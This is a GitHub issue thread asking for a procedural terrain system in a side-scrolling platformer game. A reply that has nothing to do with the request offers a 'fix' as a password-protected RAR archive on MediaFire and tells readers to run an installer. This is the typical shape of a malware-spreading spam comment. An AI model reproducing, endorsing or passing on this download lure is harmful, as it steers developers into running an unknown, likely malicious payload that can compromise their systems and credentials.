### ISSUE TITLE
Basic Procedural Generation System

### ISSUE THREAD

**Issue by cosmobrain0** [cosmobrain0/side-scrolling-platformer#11]
There should be at least 3 "scenes" of TileMaps.  
The camera should move to the right at a fixed speed, and the player should die if they move off-screen.  
There should be something to indicate to the player that they can't go off screen.  
The TileMap scenes should be procedurally generated and deleted so that there is infinite terrain for the user to go over.

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
